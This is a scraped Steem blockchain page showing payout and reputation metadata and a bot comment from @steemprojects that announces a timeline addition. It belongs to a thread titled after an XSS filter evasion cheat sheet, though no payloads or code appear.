total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length622
author_reputation23,214,230,978,060
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id81,066,025
net_rshares0
@steemprojects · 
This post has been just added as new item to _[timeline of SteemWorld on Steem Projects](https://steemprojects.com/projects/p/steemworld/?utm_source=comment_timeline&utm_medium=steem&utm_campaign=new_event&utm_content=c1)_.

If you want to be notified about new updates from this project, register on Steem Projects and add SteemWorld to your favorite projects.
properties (22)
authorsteemprojects
permlinkre-steem-platform-security-test-20190308t120428
categorysteemworld
json_metadata""
created2019-03-08 12:04:30
last_update2019-03-08 12:04:30
depth1
children0
last_payout2019-03-15 12:04:30
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length363
author_reputation29,054,729,340
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,916,624
net_rshares0
Help/Feedback